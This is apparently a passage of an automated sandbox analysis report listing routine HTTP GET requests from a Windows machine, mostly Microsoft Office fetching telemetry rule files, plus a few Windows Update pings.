                        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
